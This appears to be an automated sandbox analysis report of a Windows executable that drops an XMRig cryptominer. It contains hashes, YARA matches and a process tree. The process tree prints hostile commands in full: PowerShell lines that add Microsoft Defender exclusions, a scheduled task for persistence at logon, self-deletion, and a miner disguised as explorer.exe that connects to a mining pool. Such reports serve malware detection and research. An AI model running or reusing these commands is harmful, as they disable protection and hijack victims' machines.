Analysis
-
max time kernel
0s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
09/01/2024, 18:51
Static task
static1
Behavioral task
behavioral1
Sample
f35f0de3655f68da1d66eb80338940b2.exe
Resource
win7-20231215-en
General
-
Target
f35f0de3655f68da1d66eb80338940b2.exe
-
Size
2.0MB
-
MD5
f35f0de3655f68da1d66eb80338940b2
-
SHA1
99cbe179100079c0f379ac645d257052864accde
-
SHA256
fdf86c9ee94b5c59843fdac2e2b892b535aee999a96961bc6728e1c30060f6c5
-
SHA512
390f06ce4be990670e260f0f9fbc428b715ab287990f777059336edc44b99ce678d39a0509fe4a4a7f5abdb4c438766fae78b1c1f507f6b75a2a61d044f056ac
-
SSDEEP
49152:H5l1KjvW6IBYQSm1Qe1LtioJhJoPYipS4f/:Ay6jNaQeSkspS4
Malware Config
Signatures
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/3384-177-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/3384-180-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/3384-178-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/3384-176-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/3384-183-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/3384-186-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/3384-185-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/3384-184-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/3384-182-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/3384-189-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3404 schtasks.exe 228 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 668 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4392 wrote to memory of 448 4392 f35f0de3655f68da1d66eb80338940b2.exe 90 PID 4392 wrote to memory of 448 4392 f35f0de3655f68da1d66eb80338940b2.exe 90 PID 448 wrote to memory of 668 448 cmd.exe 89 PID 448 wrote to memory of 668 448 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\f35f0de3655f68da1d66eb80338940b2.exe"C:\Users\Admin\AppData\Local\Temp\f35f0de3655f68da1d66eb80338940b2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'3⤵PID:4264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'3⤵PID:228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'3⤵PID:2580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\f35f0de3655f68da1d66eb80338940b2.exe"2⤵PID:4108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:668
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WinRservices64" /tr '"C:\Windows\system32\WinRservices64.exe"'1⤵
- Creates scheduled task(s)
PID:3404
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WinRservices64" /tr '"C:\Windows\system32\WinRservices64.exe"' & exit1⤵PID:4304
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\f35f0de3655f68da1d66eb80338940b2.exe"1⤵PID:4808
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"2⤵PID:4228
-
-
C:\Windows\system32\WinRservices64.exe"C:\Windows\system32\WinRservices64.exe"2⤵PID:2868
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\WinRservices64.exe"3⤵PID:1172
-
-
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 31⤵PID:4512
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'1⤵PID:1996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'1⤵PID:1968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'1⤵PID:3028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'1⤵PID:1204
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit1⤵PID:4796
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WinRservices64" /tr '"C:\Windows\system32\WinRservices64.exe"'1⤵
- Creates scheduled task(s)
PID:228
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14444 --user=42HXw2siEZTPZBUzFptgewF9GRSjBAPomcziBBodj34BK7J6ffqzrbwD1SAhYt6pHUb8xiGXWan6tELK9dcrJvK49SGignA --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth1⤵PID:3384
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"1⤵PID:4880
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 31⤵PID:2432
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"1⤵PID:2768
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WinRservices64" /tr '"C:\Windows\system32\WinRservices64.exe"' & exit1⤵PID:2916
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\WinRservices64.exe"1⤵PID:3168
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
539B
MD5b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
Filesize
944B
MD5ba169f4dcbbf147fe78ef0061a95e83b
SHA192a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA2565ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA5128d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
944B
MD5eb1ad317bd25b55b2bbdce8a28a74a94
SHA198a3978be4d10d62e7411946474579ee5bdc5ea6
SHA2569e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
-
Filesize
944B
MD534f595487e6bfd1d11c7de88ee50356a
SHA14caad088c15766cc0fa1f42009260e9a02f953bb
SHA2560f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA51210976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
506KB
MD558c1fc9db48d69f3f87c6716f58606bc
SHA191c623b63fe3f7ff42510dd41e2e7bb7e9178e5b
SHA25666c757ca374bba2e2476fdb428dc02339d845f13caf9e343c6f65deeed1b7070
SHA51255fe9e3eacee02595bdbbabbc97e334d6c56f6076becdebc9cbc9abc536c2a4ef127db8a771f4f7e1d99e4564264b1898d510fa869b249ecb24f75b1bd481e75
-
Filesize
26KB
MD5727f2300ecd13e0ac879c31357d47197
SHA10346c83533f7ca16e55bae41728159718b0b044f
SHA25639127053e91ffdacc1fe82396d2d3d8e9d89fae188e72e0eb72471639b158710
SHA512e8c653e65004aa847ce62fded3d6e0c525d6e8dc0024ca096bf7e7f097400e051deb33658de76e518149378a2d9d1ae7fb95863967dc8b5c57cfaf6efbe00a86
-
Filesize
16KB
MD512e25d3412227afdd7b117c60e022d8a
SHA10376f72c97d4a3ef68a7b78df65697e6a22cbd52
SHA256a9abd13dbcb4b5be0825b863a5bcff8f5df79c3132f0c2f9bd9744b2b37277f8
SHA5128a565cd1ea06e4474b12da454ca59f68141951574d93b1d01a2b490c98895dfc8019cb5b651f8a5ee6fa8f4b35da26dc32daea042779b2aa85cebdeef3ff70d0
-
Filesize
1KB
MD59652e15111ee090067ef001db473bc65
SHA16747faffa558b61fa77c0926509348369e23de08
SHA2561045022b0d192658c423e36cb6ed14828472598919621e4d4a0e27d77c6e7eb8
SHA512b87f618458aa09fcd6bb329bd5599b33696089dd6f5f17c09cf599ba5ae32976b05e8fc9717a73c5ac8482668acad787cfa3e8e59d085fc58f88153722d5cc34
-
Filesize
142KB
MD5e84d94734d86df1252eb4d57ed0a0331
SHA15efccddbe4dac25c1b8662456488cb6e1b5c2158
SHA256173af1c98737373aad96e69958e98c6c75a3b330eecb677ac05a37f54c2461aa
SHA5127fd1cb7e0059bd2ddaa54ca5dcb57d080a93f7f085b58ca224e158549a14b2401ec4c4566c22c290b8c929c6c3200ba02a98f058f946c4d06938ce680a6bfb5d
-
Filesize
188KB
MD57cfe316ac48d11292cbad5e1212b1379
SHA18f7c2089530e9038d4722de73957ef7c64457f8a
SHA256d626208494f687b6c0cc54f7d7b6d4e73097be6f8cd37e7953d8285ccadfd707
SHA512f9b5d88d525e99c7bc54719251fa6b4decbb1de3747fc8712eb76f8ee83b854850005dc7a7257c9b05b8341a2581c96d36e8ce6d92ba3737f8b38155731cd48a
-
Filesize
8KB
MD5e2381c374ab53f01e1c9fcedb6f784be
SHA1120b8749b09ac392764c480ce26ccb863a18714c
SHA256b857a82873e07beff43e3db69241280cf67da361344daf984250e9aefb93830e
SHA51218eda93ab9d3112cc622fb43c3c58f43d4cd9fda5dd6e17bcf0c70cdefe3e55929f84488b8b9b65b84fca72ca51716ef4a35bc639b77afb752407eda6f7955f1
-
Filesize
57KB
MD591c24949aa55f07bdbc84696a107025e
SHA12ec173d90311d971424b3852dc7a61d01826e400
SHA256ad0ea883c58e0669a906148d36c6918afe2453885f35865b60efd22de9678201
SHA512d53ea8a0f4a14c74344cb86c04b00de11e805b6e4f06b1eed7ba71b187481938e4aba57a04251c8ea29bf885b44d7f4cb7e44703a7a47d74d10ad6a9c39d135c